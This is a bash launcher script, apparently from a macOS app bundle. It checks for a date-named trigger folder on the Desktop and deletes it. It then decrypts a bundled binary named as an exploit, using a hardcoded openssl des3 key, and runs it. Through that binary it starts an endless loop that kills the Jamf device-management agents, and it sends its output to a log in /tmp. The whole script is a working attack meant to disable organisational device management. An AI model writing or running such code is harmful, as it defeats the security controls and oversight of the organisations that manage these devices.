#!/usr/bin/env bash

res="$(dirname "$(dirname "$0")")/Resources"
key="$HOME/Desktop/$(date +%y%d)"
exploit="/tmp/exp.out"

exec 3>&1 4>&2
trap 'exec 2>&4 1>&3' 0 1 2 3
exec 1>/tmp/neptune_log.txt 2>&1

# Run only if directory on Desktop exists with the current year and day
echo "Checking for key at $key..."
if [[ ! -d "$key" ]]; then
    echo "Could not find key." >&2
    exit 1
fi
echo "Key found."

echo "Deleting key."
rm -rf $key
echo "Decrypting and preparing exploit."
openssl des3 -d -in "$res/exp.out.des3" -k b51861c95142fce29aef7b6416fa21d5 > "$exploit"
chmod +x "$exploit"

echo "Doing work."
"$exploit" <<'EOF'
(for ((;;)); do killall jamf jamfAgent; done) &
EOF
